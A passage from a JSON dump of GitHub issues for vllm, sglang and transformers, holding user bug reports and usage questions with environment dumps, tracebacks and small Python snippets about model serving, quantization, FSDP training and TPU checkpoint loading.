vllm\n\nI want to get int8 kv cache data from [qwen-int8](https://www.modelscope.cn/models/Qwen/Qwen-7B-Chat-Int8). I don't know whether vLLM can do that. 
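The closest thing I have found is quantizing the cache at runtime rather than exporting it; a minimal sketch of that (fp8 rather than int8, since that is what current vLLM versions expose; as far as I can tell there is no public API for dumping the cache to a local file):

```python
from vllm import LLM, SamplingParams

# kv_cache_dtype="fp8" keeps the KV cache quantized in GPU memory;
# persisting the cache tensors to disk would still need custom code.
llm = LLM(
    model="Qwen/Qwen-7B-Chat-Int8",
    kv_cache_dtype="fp8",
    trust_remote_code=True,
)
outputs = llm.generate(["Hello"], SamplingParams(max_tokens=16))
print(outputs[0].outputs[0].text)
```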
Thank you.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30447", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-11T01:43:58Z", "updated_at": "2025-12-12T15:11:50Z", "comments": 1, "user": "chx725" }, { "repo": "vllm-project/vllm", "number": 30441, "title": "[Usage]: vllm serve setup issues on B300", "body": "### Your current environment\n\nThe output of `python collect_env.py`\n```text\n\n\nCollecting environment information...\nuv is set\n==============================\n System Info\n==============================\nOS : Amazon Linux 2023.9.20251208 (x86_64)\nGCC version : (GCC) 11.5.0 20240719 (Red Hat 11.5.0-5)\nClang version : Could not collect\nCMake version : version 3.22.2\nLibc version : glibc-2.34\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu130\nIs debug build : False\nCUDA used to build PyTorch : 13.0\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.11.14 (main, Nov 12 2025, 00:00:00) [GCC 11.5.0 20240719 (Red Hat 11.5.0-5)] (64-bit runtime)\nPython platform : Linux-6.1.158-180.294.amzn2023.x86_64-x86_64-with-glibc2.34\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 13.0.88\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA B300 SXM6 AC\nGPU 1: NVIDIA B300 SXM6 AC\nGPU 2: NVIDIA B300 SXM6 AC\nGPU 3: NVIDIA B300 SXM6 AC\nGPU 4: NVIDIA B300 SXM6 AC\nGPU 5: NVIDIA B300 SXM6 AC\nGPU 6: NVIDIA B300 SXM6 AC\nGPU 7: NVIDIA B300 SXM6 AC\n\nNvidia driver version : 580.105.08\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Platinum 8559C\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 2\nBogoMIPS: 4800.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq monitor ssse3 fma cx16 pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves avx_vnni avx512_bf16 wbnoinvd ida arat avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq rdpid cldemote movdiri movdir64b md_clear serialize amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nHypervisor vendor: KVM\nVirtualization type: full\nL1d cache: 4.5 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 
192 MiB (96 instances)\nL3 cache: 640 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-47,96-143\nNUMA node1 CPU(s): 48-95,144-191\nVulnerability Gather data sampling: Not affected\nVulnerability Indirect target selection: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; PBRSB-eIBRS SW sequence; BHI BHI_DIS_S\nVulnerability Srbds: Not affected\nVulnerability Tsa: Not affected\nVulnerability Tsx async abort: Not affected\nVulnerability Vms", "url": "https://github.com/vllm-project/vllm/issues/30441", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-10T23:50:27Z", "updated_at": "2025-12-13T02:01:04Z", "comments": 1, "user": "navmarri14" }, { "repo": "sgl-project/sglang", "number": 14824, "title": "Throughput degradation on Qwen3-30B-A3B with EAGLE3", "body": "I observed a throughput degradation when trying to use EAGLE3 to speed up Qwen3-30B-A3B (on 2x H100).\n\nI suspect the overhead might be overshadowing the gains. It would be great if we could have some profiling analysis to pinpoint exactly where the cost is coming from.\n\nAlso, tuning parameters for MoE models feels much more difficult than for dense models. Do you think it would be possible to provide guidance or a micro-benchmarking script? This would really help users quickly identify the optimal parameters for their specific hardware.\n\n(For reference, the related issue is [this](https://github.com/sgl-project/SpecForge/issues/339).)\n\nTwo quick questions:\n\nI\u2019m still wondering: why does EAGLE3 seem less effective on Qwen3 compared to other models?\n\nAre there any specific tricks for training a high-quality EAGLE3 draft model for this architecture?\n\nThanks! 
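P.S. In case it helps, this is the kind of A/B harness I have in mind (offline `sgl.Engine` API; the speculative flags mirror the documented server arguments, and the draft-model path and tuning values are placeholders, not recommendations):

```python
import time

import sglang as sgl

PROMPTS = ["Explain speculative decoding in one paragraph."] * 32
SAMPLING = {"temperature": 0, "max_new_tokens": 256}


def bench(**spec_kwargs) -> float:
    """Return end-to-end generation throughput (tokens/s) for one engine config."""
    llm = sgl.Engine(model_path="Qwen/Qwen3-30B-A3B", tp_size=2, **spec_kwargs)
    start = time.perf_counter()
    outputs = llm.generate(PROMPTS, SAMPLING)
    elapsed = time.perf_counter() - start
    tokens = sum(o["meta_info"]["completion_tokens"] for o in outputs)
    llm.shutdown()
    return tokens / elapsed


baseline = bench()
eagle3 = bench(
    speculative_algorithm="EAGLE3",
    speculative_draft_model_path="path/to/eagle3-draft",  # placeholder
    speculative_num_steps=3,
    speculative_eagle_topk=4,
    speculative_num_draft_tokens=16,
)
print(f"baseline: {baseline:.1f} tok/s, EAGLE3: {eagle3:.1f} tok/s")
```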
\ud83e\udd79\ud83e\udd79\n", "url": "https://github.com/sgl-project/sglang/issues/14824", "state": "open", "labels": [], "created_at": "2025-12-10T14:22:05Z", "updated_at": "2025-12-19T21:36:54Z", "comments": 1, "user": "Zzsf11" }, { "repo": "vllm-project/vllm", "number": 30392, "title": "[Bug]: Docker image v0.12.0 Fail to serve via Docker image", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu129\nIs debug build : False\nCUDA used to build PyTorch : 12.9\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 (main, Oct 10 2025, 08:52:57) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-6.6.87.2-microsoft-standard-WSL2-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.9.86\nCUDA_MODULE_LOADING set to :\nGPU models and configuration :\nGPU 0: NVIDIA RTX A4000\nGPU 1: NVIDIA RTX A4000\n\nNvidia driver version : 581.15\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 48 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 8\nOn-line CPU(s) list: 0-7\nVendor ID: AuthenticAMD\nModel name: AMD Ryzen 7 3800X 8-Core Processor\nCPU family: 23\nModel: 113\nThread(s) per core: 2\nCore(s) per socket: 4\nSocket(s): 1\nStepping: 0\nBogoMIPS: 7800.02\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid tsc_known_freq pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy svm cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw topoext perfctr_core ssbd ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 clzero xsaveerptr arat npt nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold v_vmsave_vmload umip rdpid\nVirtualization: AMD-V\nHypervisor vendor: Microsoft\nVirtualization type: full\nL1d cache: 128 KiB (4 instances)\nL1i cache: 128 KiB (4 instances)\nL2 cache: 2 MiB (4 instances)\nL3 cache: 16 MiB (1 instance)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-7\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Mitigation; untrained return thunk; SMT enabled with STIBP protection\nVulnerability Spec rstack overflow: Vulnerable: Safe RET, no microcode\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers 
and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Retpolines; IBPB conditional; STIBP always-on; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.3\n[pip3] numpy==2.2.0\n[pip3] nvidia-cublas-cu12==12.9.1.4\n[pip3] nvidia-cuda-cupti-cu12==12.9.79\n[pip3] nvidia-cuda-nvrtc-cu12==12.9.86\n[pip3] nvidia-cuda-runtime-cu12==12.9.79\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.16.0\n[pip3] nvidia-cufft-cu12==11.4.1.4\n[pip3] nvidia-cufile-cu12==1.14.1.1\n[pip3] nvidia-curand-cu12==10.3.10.19\n[pip3] nvidia-cusolver-cu12==11.7.5.82\n[pip3] nvidia-cusparse-cu12==12.5.10.65\n[pip3] nvidia-cusparselt-cu12==0.7.1\n[pip3] nvidia-cutlass-dsl==4.3.1\n[pip3] ", "url": "https://github.com/vllm-project/vllm/issues/30392", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-10T13:43:59Z", "updated_at": "2026-01-04T14:24:56Z", "comments": 7, "user": "kuopching" }, { "repo": "huggingface/transformers", "number": 42771, "title": "FSDP of Trainer does not work well with Accelerate", "body": "### System Info\n\n- `transformers` version: 4.57.3\n- Platform: Linux-6.6.97+-x86_64-with-glibc2.35\n- Python version: 3.11.11\n- Huggingface_hub version: 0.36.0\n- Safetensors version: 0.7.0\n- Accelerate version: 1.12.0\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.9.1+cu128 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script?: \n- GPU type: NVIDIA H100 80GB HBM3\n\n### Who can help?\n\n@3outeille @ArthurZucker @SunMarc \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\n\"\"\"\nSimple example of training BERT with Transformers Trainer and FSDP\nUses random data for quick demonstration\n\"\"\"\n\nimport torch\nfrom transformers import (\n BertForSequenceClassification,\n BertTokenizer,\n Trainer,\n TrainingArguments,\n)\nfrom torch.utils.data import Dataset\n\n\n# Create a simple dataset with random data\nclass RandomDataset(Dataset):\n def __init__(self, tokenizer, num_samples=1000, max_length=128):\n self.tokenizer = tokenizer\n self.num_samples = num_samples\n self.max_length = max_length\n \n def __len__(self):\n return self.num_samples\n \n def __getitem__(self, idx):\n # Generate random token IDs\n input_ids = torch.randint(\n 0, self.tokenizer.vocab_size, (self.max_length,)\n )\n attention_mask = torch.ones(self.max_length)\n labels = torch.randint(0, 2, (1,)).item() # Binary classification\n \n return {\n \"input_ids\": input_ids,\n \"attention_mask\": attention_mask,\n \"labels\": labels,\n }\n\n\ndef main():\n # Initialize tokenizer and model\n model_name = \"bert-base-uncased\"\n tokenizer = BertTokenizer.from_pretrained(model_name)\n model = BertForSequenceClassification.from_pretrained(\n model_name, num_labels=2\n )\n \n # Create random datasets\n train_dataset = RandomDataset(tokenizer, num_samples=1000)\n eval_dataset = RandomDataset(tokenizer, num_samples=200)\n \n # 
Configure FSDP training arguments\n training_args = TrainingArguments(\n output_dir=\"./bert_fsdp_output\",\n num_train_epochs=3,\n per_device_train_batch_size=8,\n per_device_eval_batch_size=8,\n logging_steps=50,\n eval_strategy=\"steps\",\n eval_steps=100,\n save_steps=200,\n save_total_limit=2,\n \n # FSDP Configuration\n fsdp=\"full_shard auto_wrap\", # Enable FSDP with full sharding\n fsdp_config={\n \"fsdp_transformer_layer_cls_to_wrap\": [\"BertLayer\"], # Wrap BERT layers\n \"fsdp_backward_prefetch\": \"backward_pre\",\n \"fsdp_forward_prefetch\": False,\n \"fsdp_use_orig_params\": True,\n },\n \n # Additional settings\n learning_rate=5e-5,\n warmup_steps=100,\n weight_decay=0.01,\n logging_dir=\"./logs\",\n report_to=\"none\", # Disable wandb/tensorboard for simplicity\n )\n \n # Initialize Trainer\n trainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=train_dataset,\n eval_dataset=eval_dataset,\n )\n \n # Train the model\n print(\"Starting training with FSDP...\")\n trainer.train()\n \n # Save the final model\n trainer.save_model(\"./bert_fsdp_final\")\n print(\"Training completed!\")\n\n\nif __name__ == \"__main__\":\n # Note: Run this script with torchrun for multi-GPU training\n # Example: torchrun --nproc_per_node=2 train_bert_fsdp.py\n main()\n```\n\ntorchrun --nproc_per_node=2 train_bert_fsdp.py\n\n### Expected behavior\n\nIt will fail silently. The trace stack, \n```bash\nW1210 12:49:05.011000 104846 site-packages/torch/distributed/run.py:803] \nW1210 12:49:05.011000 104846 site-packages/torch/distributed/run.py:803] *****************************************\nW1210 12:49:05.011000 104846 site-packages/torch/distributed/run.py:803] Setting OMP_NUM_THREADS environment variable for each process to be 1 in default, to avoid your system being overloaded, please further tune the variable for optimal performance in your application as needed. \nW1210 12:49:05.011000 104846 site-packages/torch/distributed/run.py:803] *****************************************\nSome weights of BertForSequenceClassification were not initialized from the model checkpoint at bert-base-uncased and are newly initialized: ['classifier.bias', 'classifier.weight']\nYou should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.\nSome weights of BertForSequenceClassification were not initialized from the model check", "url": "https://github.com/huggingface/transformers/issues/42771", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-10T12:54:49Z", "updated_at": "2025-12-11T07:07:19Z", "comments": 2, "user": "gouchangjiang" }, { "repo": "vllm-project/vllm", "number": 30381, "title": "[Usage]:", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). 
I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30381", "state": "closed", "labels": [ "usage" ], "created_at": "2025-12-10T09:27:51Z", "updated_at": "2025-12-10T09:28:26Z", "comments": 0, "user": "tobeprozy" }, { "repo": "vllm-project/vllm", "number": 30380, "title": "[Usage]: How do people usually use vllm/tests?", "body": "### Your current environment\n\nanywhere\n\n### How would you like to use vllm\n\nI don't know how to use the vllm tests.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30380", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-10T09:27:46Z", "updated_at": "2025-12-10T13:19:18Z", "comments": 1, "user": "tobeprozy" }, { "repo": "vllm-project/vllm", "number": 30379, "title": "[Usage]: how to use vllm/tests/?", "body": "### Your current environment\n\nHow do people usually use [vllm](https://github.com/vllm-project/vllm/tree/main)/[tests](https://github.com/vllm-project/vllm/tree/main/tests)?\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30379", "state": "closed", "labels": [ "usage" ], "created_at": "2025-12-10T09:25:52Z", "updated_at": "2025-12-10T09:26:25Z", "comments": 0, "user": "tobeprozy" }, { "repo": "vllm-project/vllm", "number": 30375, "title": "[Bug]: [TPU] ShapeDtypeStruct error when loading custom safetensors checkpoint on TPU v5litepod", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\nPyTorch version: 2.9.0+cu128\nvLLM version: 0.12.0 (vllm-tpu)\nJAX version: 0.8.0\nPython version: 3.12.8 (main, Jan 14 2025, 22:49:14) [Clang 19.1.6]\n\nTPU: v5litepod-4 (4 chips, single host)\nOS: Amazon Linux 2023 (container)\nContainer runtime: Podman with --privileged --net=host\n\nAdditional packages:\n- tpu_inference (bundled with vllm-tpu)\n- flax (from tpu_inference deps)\n- orbax-checkpoint: 0.11.28\n- safetensors: 0.4.5\n- transformers: 4.57.3
\n\n### \ud83d\udc1b Describe the bug\n\nvLLM-TPU fails to load a **local HuggingFace checkpoint** (safetensors format) on TPU v5litepod with this error:\n\n```\nTypeError: Argument 'model.states[0][6]' of shape bfloat16[128] of type is not a valid JAX type.\n```\n\n**The core issue:** The Flax NNX model loader in `tpu_inference` creates the model with `ShapeDtypeStruct` shape placeholders, but these placeholders are never replaced with actual weight arrays before JIT compilation.\n\nLoading from **HuggingFace Hub works fine** (e.g., `Qwen/Qwen3-0.6B`), but loading the **exact same model architecture from a local directory fails**.\n\n### How to reproduce the bug\n\n**Minimal reproduction:**\n\n```python\nfrom vllm import LLM\n\n# This WORKS:\nmodel = LLM(\"Qwen/Qwen3-0.6B\", tensor_parallel_size=4, dtype=\"bfloat16\")\n\n# This FAILS with ShapeDtypeStruct error:\nmodel = LLM(\n    model=\"/path/to/local/checkpoint\",  # Contains model.safetensors + config.json\n    tensor_parallel_size=4,\n    dtype=\"bfloat16\",\n    trust_remote_code=True,\n)\n```\n\n**Checkpoint directory contents:**\n```\n/path/to/local/checkpoint/\n\u251c\u2500\u2500 config.json # Valid Qwen3 config with \"architectures\": [\"Qwen3ForCausalLM\"]\n\u251c\u2500\u2500 model.safetensors # bfloat16 weights (~1.2GB for Qwen3-0.6B)\n\u251c\u2500\u2500 tokenizer.json\n\u251c\u2500\u2500 tokenizer_config.json\n\u251c\u2500\u2500 special_tokens_map.json\n\u251c\u2500\u2500 vocab.json\n\u2514\u2500\u2500 merges.txt\n```\n\n**Context:** The checkpoint was converted from MaxText/Orbax format using orbax-checkpoint + safetensors libraries. The weights are valid (verified with `safetensors.torch.load_file()`).\n\n### Full error traceback\n\n```\nFile \"/pm_env/.venv/lib/python3.12/site-packages/tpu_inference/models/common/model_loader.py\", line 345, in get_model\n return get_flax_model(vllm_config, rng, mesh, is_draft_model)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nFile \"/pm_env/.venv/lib/python3.12/site-packages/tpu_inference/models/common/model_loader.py\", line 219, in get_flax_model\n jit_model = _get_nnx_model(model_class, vllm_config, rng, mesh)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nFile \"/pm_env/.venv/lib/python3.12/site-packages/tpu_inference/models/common/model_loader.py\", line 200, in _get_nnx_model\n jit_model = create_jit_model(\n ^^^^^^^^^^^^^^^^^\nFile \"/pm_env/.venv/lib/python3.12/site-packages/flax/nnx/transforms/compilation.py\", line 431, in __call__\n pure_args_out, pure_kwargs_out, pure_out = self.jitted_fn(\n ^^^^^^^^^^^^^^^\nTypeError: Argument 'model.states[0][6]' of shape bfloat16[128] of type is not a valid JAX type.\n```\n\n### What I tried\n\n| Attempt | Result |\n|---------|--------|\n| Load from HuggingFace Hub | \u2705 Works |\n| Load local checkpoint (safetensors) | \u274c ShapeDtypeStruct error |\n| Use float32 dtype | \u274c Same error |\n| Use bfloat16 dtype | \u274c Same error |\n| Set `VLLM_USE_V1=0` | \u274c Still uses v1 engine on TPU |\n| Add `pytorch_model.bin` alongside safetensors | \u274c Same error |\n\n### Expected behavior\n\nvLLM should load the weights from the local safetensors file and initialize the model, exactly like it does when loading from HuggingFace Hub.\n\n### Analysis\n\nLooking at the traceback, the issue is in `tpu_inference/models/common/model_loader.py`:\n\n1. `get_flax_model()` creates the model architecture\n2. `_get_nnx_model()` calls `create_jit_model()` \n3. 
At this point, `model.states[0][6]` is still a `ShapeDtypeStruct` placeholder instead of actual weight data\n4. JIT compilation fails because it can't compile shape placeholders\n\nIt seems like when loading from Hub, weights get populated before JIT compilation, but when loading from local path, this step is skipped or fails silently.\n\n### Additional context\n\n- We're building an RL environment for LLM evaluation that needs to load custom finetuned checkpoints\n- JetStream/MaxText can load the same Orbax checkpoints without issues\n- The safetensors file was verified to contain valid tensors with correct shapes\n- This blocks our ability to use vLLM's logprobs-based evaluation on TPU\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30375", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-10T08:12:57Z", "updated_at": "2025-12-11T05:34:19Z", "comments": 1, "user": "Baltsat" }, { "repo": "sgl-project/sglang", "number": 14800, "title": "How should we set piecewise-cuda-graph-max-tokens according to TP DP and chunked-prefill-size?", "body": "How should we set piecewise-cuda-graph-max-tokens according to TP DP and chunked-prefill-size?\nFor TP only, should we set piecewise-cuda-graph-max-tokens = chunked-prefill-size?\nand for DP attention DP<=TP, should we set piecewise-cuda-graph-max-tokens = chunked-prefill-size/DP?\nThanks.", "url": "https://github.com/sgl-project/sglang/issues/14800", "state": "open", "labels": [], "created_at": "2025-12-10T07:26:36Z", "updated_at": "2025-12-10T07:26:36Z", "comments": 0, "user": "llc-kc" }, { "repo": "sgl-project/sglang", "number": 14783, "title": "[Bug][ConvertLinalgRToBinary] encounters error: bishengir-compile: Unknown command line argument '--target=Ascend910B2C'. Try: '/usr/local/Ascend/ascend-toolkit/latest/bin/bishengir-compile --help' bishengir-compile: Did you mean '--pgso=Ascend910B2C'?", "body": "### Checklist\n\n- [x] I searched related issues but found no solution.\n- [ ] The bug persists in the latest version.\n- [ ] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [ ] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [ ] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\n(sglang-latest) [root:trinity-asr]$ bash test.sh\n/opt/conda/envs/sglang-latest/lib/python3.11/site-packages/torch_npu/dynamo/torchair/__init__.py:8: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. 
Refrain from using this package or pin to Setuptools<81.\n import pkg_resources\nINFO 12-10 11:48:25 [importing.py:53] Triton module has been replaced with a placeholder.\nINFO 12-10 11:48:26 [__init__.py:243] No platform detected, vLLM is running on UnspecifiedPlatform\nWARNING 12-10 11:48:27 [_logger.py:72] Failed to import from vllm._C with ModuleNotFoundError(\"No module named 'vllm._C'\")\n/usr/local/Ascend/thirdparty/sglang/sglang_diffusion_ascend/python/sglang/srt/layers/quantization/awq.py:69: UserWarning: Only CUDA, HIP and XPU support AWQ currently.\n warnings.warn(f\"Only CUDA, HIP and XPU support AWQ currently.\")\n/usr/local/Ascend/thirdparty/sglang/sglang_diffusion_ascend/python/sglang/srt/layers/quantization/gguf.py:46: UserWarning: Only CUDA support GGUF q uantization currently.\n warnings.warn(f\"Only CUDA support GGUF q uantization currently.\")\n[2025-12-10 11:48:27] WARNING server_args.py:1379: At this moment Ascend attention backend only supports a page_size of 128, change page_size to 128.\n[2025-12-10 11:48:27] server_args=ServerArgs(model_path='./TrinityASR', tokenizer_path='./TrinityASR', tokenizer_mode='auto', tokenizer_worker_num=1, skip_tokenizer_init=False, load_format='auto', model_loader_extra_config='{}', trust_remote_code=True, context_length=None, is_embedding=False, enable_multimodal=None, revision=None, model_impl='auto', host='0.0.0.0', port=30000, fastapi_root_path='', grpc_mode=False, skip_server_warmup=False, warmups=None, nccl_port=None, checkpoint_engine_wait_weights_before_ready=False, dtype='auto', quantization=None, quantization_param_path=None, kv_cache_dtype='auto', enable_fp32_lm_head=False, modelopt_quant=None, modelopt_checkpoint_restore_path=None, modelopt_checkpoint_save_path=None, modelopt_export_path=None, quantize_and_serve=False, mem_fraction_static=0.6, max_running_requests=None, max_queued_requests=None, max_total_tokens=None, chunked_prefill_size=-1, max_prefill_tokens=65536, schedule_policy='fcfs', enable_priority_scheduling=False, abort_on_priority_when_disabled=False, schedule_low_priority_values_first=False, priority_scheduling_preemption_threshold=10, schedule_conservativeness=1.0, page_size=128, hybrid_kvcache_ratio=None, swa_full_tokens_ratio=0.8, disable_hybrid_swa_memory=False, radix_eviction_policy='lru', device='npu', tp_size=1, pp_size=1, pp_max_micro_batch_size=None, stream_interval=1, stream_output=False, random_seed=309118768, constrained_json_whitespace_pattern=None, constrained_json_disable_any_whitespace=False, watchdog_timeout=300, dist_timeout=None, download_dir=None, base_gpu_id=0, gpu_id_step=1, sleep_on_idle=False, mm_process_config={}, log_level='info', log_level_http=None, log_requests=False, log_requests_level=2, crash_dump_folder=None, show_time_cost=False, enable_metrics=False, enable_metrics_for_all_schedulers=False, tokenizer_metrics_custom_labels_header='x-custom-labels', tokenizer_metrics_allowed_custom_labels=None, bucket_time_to_first_token=None, bucket_inter_token_latency=None, bucket_e2e_request_latency=None, collect_tokens_histogram=False, prompt_tokens_buckets=None, generation_tokens_buckets=None, gc_warning_threshold_secs=0.0, decode_log_interval=40, enable_request_time_stats_logging=False, kv_events_config=None, enable_trace=False, otlp_traces_endpoint='localhost:4317', export_metrics_to_file=False, export_metrics_to_file_dir=None, api_key=None, served_model_name='./TrinityASR', weight_version='default', chat_template=None, completion_template=None, file_storage_path='sglang_storage', 
enable_cache_report=False, reasoning_parser=None, tool_call_parser=None, tool_server=None, sampling_defaults='model', dp_size=1, load_balance_method='round_robin', load_watch_interval=0.1, prefill_round_robin_balance=False, dist_init_addr=None, nnodes=1, node_rank=0, json_model_override_args='{}', preferred_sampling_params=None, enable_lora=None, max_lora_rank=None, lora_target_modules=None, lora_paths=None, max_loaded_loras=None, max_loras_per_batch=8, lora_eviction_policy='lru', lora_backend='csgmv', max_lora_chunk_size=16, attention_backend='ascend', decode_attention_backend=None, prefill_attention_backend=None, sampling_backend='pytorch',", "url": "https://github.com/sgl-project/sglang/issues/14783", "state": "closed", "labels": [ "npu" ], "created_at": "2025-12-10T03:54:50Z", "updated_at": "2025-12-13T12:28:26Z", "comments": 1, "user": "rsy-hub4121" }, { "repo": "huggingface/transformers", "number": 42757, "title": "cannot import name 'is_offline_mode' from 'huggingface_hub'", "body": "### System Info\n\n- transformers-5.0.0\n- huggingface_hub-1.2.1\n```\nImportError: cannot import name 'is_offline_mode' from 'huggingface_hub' (/root/miniconda3/envs/transformers/lib/python3.10/site-packages/huggingface_hub/__init__.py)\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder 